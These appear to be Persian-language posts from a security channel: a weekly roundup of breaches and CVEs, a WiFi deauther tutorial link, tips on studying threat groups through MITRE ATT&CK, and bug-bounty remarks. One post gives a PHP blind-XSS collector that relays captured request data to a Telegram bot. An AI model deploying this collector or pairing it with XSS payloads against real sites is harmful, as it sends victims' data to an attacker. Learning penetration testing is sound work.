Code Block
جمع بندی هفتگی دنیای ه#ک و امنیت
⚡️ تهدید هفته | MongoBleed
🩸 حمله فعال به MongoDB
🔥 آسیبپذیری بحرانی CVE-2025-14847 (CVSS 8.7)
👻 افشای اطلاعات حساس از حافظه سرور بدون احراز هویت
🌍 بیش از 87,000 اینستنس آسیبپذیر در دنیا
☁️ 42٪ محیطهای ابری حداقل یک MongoDB آسیبپذیر دارن
🛠 تنها راه نجات: آپدیت فوری
🚨 اخبار داغ هفته
💸 هک Trust Wallet
🧨 هک افزونه Chrome و سرقت 7 میلیون دلار
🔑 سوءاستفاده از API Key لیکشده
⚠️ فقط نسخه 2.68 آلوده بوده
🐼 APT چینی و DNS Poisoning
🎯 گروه Evasive Panda
🧬 تزریق بدافزار MgBot
🌐 حمله از طریق آلودهسازی DNS و آپدیت نرمافزارهای محبوب
🔐 زخم قدیمی LastPass
🕳 لیک 2022 هنوز قربانی میگیره
💰 سرقت حداقل 35 میلیون دلار کریپتو
🇷🇺 ردپای اکوسیستم سایبری روسیه
🧓 Fortinet | باگ 5 ساله هنوز زنده است
🔓 CVE-2020-12812
🚫 بایپس 2FA فقط با تغییر حروف یوزرنیم
📢 ریست کامل Credential توصیه شده
📦 npm آلوده = هک WhatsApp
😈 پکیج جعلی lotusbail
👁 دسترسی کامل به پیامها حتی بعد از Uninstall
📉 بیش از 56K دانلود قبل از حذف
️🔥 CVEهای ترند هفته
⚠️ اکسپلویت سریع، تأخیر = نفوذ
MongoDB – CVE-2025-14847
LangChain – CVE-2025-68664
n8n – CVE-2025-68613
Exim – CVE-2025-26794
Python http.client – CVE-2025-13836
TeamViewer DEX – CVE-2025-44016
🌍 اطراف دنیای سایبر
👮♂️ دستگیری ادمین پشتیبانی Coinbase در هند (فروش دیتا)
🛰 حملات Cloud Atlas به روسیه و بلاروس
🦅 لودر جدید BlackHawk با Obfuscation مبتنی بر AI
📈 جهش مشکوک سرورهای Cobalt Strike
🕶 شناسایی ادمین مارکت زیرزمینی Russian Market
🎭 کمپین کلاهبرداری شغلی در خاورمیانه
✏️ آلودهسازی EmEditor و توزیع Infostealer
🐳 Docker ایمیجهای Hardened رو رایگان کرد
💥 RCE بحرانی در Livewire (Laravel)
🤖 بدافزار ChimeraWire برای دستکاری SERP
📱 جاسوسافزار اندرویدی LANDFALL و ResidentBat
🧑💻 IRها که خودشون باجافزار زدن!
🧠 سوءاستفاده چین از تحقیقات هستهای آمریکا
⛓️ ابزار AI تاریک DIG AI در تور
🪙 دعوای ژئوپولیتیکی بر سر بیتکوینهای مصادرهشده
🧠 جمعبندی نهایی
2025 با یک پیام واضح تموم شد:
اعتماد کور، آپدیت دیرهنگام و دسترسی بیش از حد = فاجعه
الگوها تکرار میشن، فقط ابزارها عوض میشن. 2026 قراره سریعتر و خشنتر باشه.
🕳 هشیار بمون، لاگها رو بخون، و همیشه یک قدم جلوتر باش.
Code Block
آموزش ساخت گجت WiFi Deauther | تست نفوذ شبکههای بیسیم (آموزشی)
⬅️مشاهده ویدیو در یوتیوب➡️
Code Block
یک وب هوک ساده برای پیاده سازیXSS BLIND و دریافت تایید در تلگرام کافیه در روت سرورتون این فایل رو قرار بدید و درخواست رو بهش ارسال کنید .
آموزش XSS
<?php
// 1. Capture the data
$data = $_REQUEST['log'] ?? 'No data received';
$apiToken = "5495368924:**-yOM089UU";
$chatId = "5*6";
// 3. Prepare the message
$message = "New Log Entry:\n" . $data;
// 4. Send the request
$url = "https://api.telegram.org/bot$apiToken/sendMessage?chat_id=$chatId&text=" . urlencode($message);
$response = file_get_contents($url);
// Optional: Check if it worked
if ($response) {
echo "Log sent to Telegram!";
}
?>
چطور از 5 گروه برتر سال یاد بگیریم !؟
قدم اول به وبسایت زیر برید
https://attack.mitre.org
قدم دوم اسم گروه رو سرچ کنید (برای مثال Lazarus) و روی نتیجه جستجو در صورت وجود کلیک کنید .
قدم سوم شروع به خواندن در مورد گروه کنید و اگر انگلیسی بلد نیستید از هوش مصنوعی یا گوگل Translate استفاده کنید .
تقریبا میشه گفت مهم ترین بهش در هر گروه Techniqus Used هست که در واقع روش هایی هستند که اون تیم از اونها استفاده میکنه البته فقط تکنیک هایی که شناسایی شدند
یک نمونه ارسال گزارش مزخرف در هکروان که هیچ چیزیو رعایت نکرده توجه داشته باشید که در زمان ارسال گزارش خیلی باید حواستون باشه به impact و توضیحی که درمورد آسیب پذیری ارائه میدید
Code Block
این یکی گزارشمو توی هکروان شیر میکنم باهاتون اما چرا فقط این و گذاشتم ؟ چون یک تارگتی بود که خفن ترینای دنیا توی هکروان روش کار کرده بودن و من این و زدم اگه Duplicate.
نخورد
Code Block